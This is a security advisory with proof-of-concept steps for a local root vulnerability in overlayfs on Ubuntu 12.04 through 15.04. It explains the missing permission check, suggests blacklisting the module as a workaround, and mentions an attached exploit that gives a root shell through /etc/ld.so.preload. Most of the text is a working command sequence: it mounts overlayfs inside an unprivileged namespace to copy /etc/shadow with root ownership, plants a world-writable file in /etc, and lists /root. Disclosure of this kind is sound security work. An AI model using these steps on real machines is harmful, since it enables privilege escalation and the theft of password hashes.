Ubuntu 12.04, 14.04, 14.10, 15.04 - overlayfs Local Root

1. The overlayfs filesystem does not correctly check file permissions when
2. creating new files in the upper filesystem directory. This can be exploited
3. by an unprivileged process in kernels with CONFIG_USER_NS=y and where
4. overlayfs has the FS_USERNS_MOUNT flag, which allows the mounting of overlayfs
5. inside unprivileged mount namespaces. This is the default configuration of
6. Ubuntu 12.04, 14.04, 14.10, and 15.04 [1].
7.  
8. If you don't want to update your kernel and you don't use overlayfs, a viable
9. workaround is to just remove or blacklist overlayfs.ko / overlay.ko.
10.  
11. (ASM)
12.  
13. Details
14. ================================
15.  
16. >From Documentation/filesystems/overlayfs.txt [2]:
17.  
18. "Objects that are not directories (files, symlinks, device-special
19. files etc.) are presented either from the upper or lower filesystem as
20. appropriate. When a file in the lower filesystem is accessed in a way
21. the requires write-access, such as opening for write access, changing
22. some metadata etc., the file is first copied from the lower filesystem
23. to the upper filesystem (copy_up)."
24.  
25. The ovl_copy_up_* functions do not correctly check that the user has
26. permission to write files to the upperdir directory. The only permissions
27. that are checked is if the owner of the file that is being modified has
28. permission to write to the upperdir. Furthermore, when a file is copied from
29. the lowerdir the file metadata is carbon copied, instead of attributes such as
30. owner being changed to the user that triggered the copy_up_* procedures.
31.  
32. Example of creating a 1:1 copy of a root-owned file:
33.  
34. (Note that the workdir= option is not needed on older kernels)
35.  
36. [email protected]:~$ ./create-namespace
37. [email protected]:~# mount -t overlay -o
38. lowerdir=/etc,upperdir=upper,workdir=work overlayfs o
39. [email protected]:~# chmod 777 work/work/
40. [email protected]:~# cd o
41. [email protected]:~/o# mv shadow copy_of_shadow
42. (exit the namespace)
43. [email protected]:~$ ls -al upper/copy_of_shadow
44. -rw-r----- 1 root shadow 1236 May 24 15:51 upper/copy_of_shadow
45. [email protected]:~$ stat upper/copy_of_shadow /etc/shadow|grep Inode
46. Device: 801h/2049d Inode: 939791 Links: 1
47. Device: 801h/2049d Inode: 277668 Links: 1
48.  
49. Now we can place this file in /etc by switching "upper" to be the lowerdir
50. option, the permission checks pass since the file is owned by root and root
51. can write to /etc.
52.  
53. [email protected]:~$ ./create-namespace
54. [email protected]:~# mount -t overlay -o
55. lowerdir=upper,upperdir=/etc,workdir=work overlayfs o
56. [email protected]:~# chmod 777 work/work/
57. [email protected]:~# cd o
58. [email protected]:~/o# chmod 777 copy_of_shadow
59. [email protected]:~/o# exit
60. [email protected]:~$ ls -al /etc/copy_of_shadow
61. -rwxrwxrwx 1 root shadow 1236 May 24 15:51 /etc/copy_of_shadow
62.  
63. The attached exploit gives a root shell by creating a world-writable
64. /etc/ld.so.preload file. The exploit has been tested on the most recent
65. kernels before 2015-06-15 on Ubuntu 12.04, 14.04, 14.10 and 15.04.
66.  
67. It is also possible to list directory contents for any directory on the system
68. regardless of permissions:
69.  
70. [email protected]:~$ ls -al /root
71. ls: cannot open directory /root: Permission denied
72. [email protected]:~$ mkdir o upper work
73. [email protected]:~$ mount -t overlayfs -o
74. lowerdir=/root,upperdir=/home/user/upper,workdir=/home/user/work
75. overlayfs /home/user/o
76. [email protected]:~$ ls -al o 2>/dev/null
77. total 8
78. drwxrwxr-x 1 root nogroup 4096 May 24 16:33 .
79. drwxr-xr-x 8 root nogroup 4096 May 24 16:33 ..
80. -????????? ? ? ? ? ? .bash_history
81. -????????? ? ? ? ? ? .bashrc
82. d????????? ? ? ? ? ? .cache
83. -????????? ? ? ? ? ? .lesshst
84. d????????? ? ? ? ? ? linux-3.19.0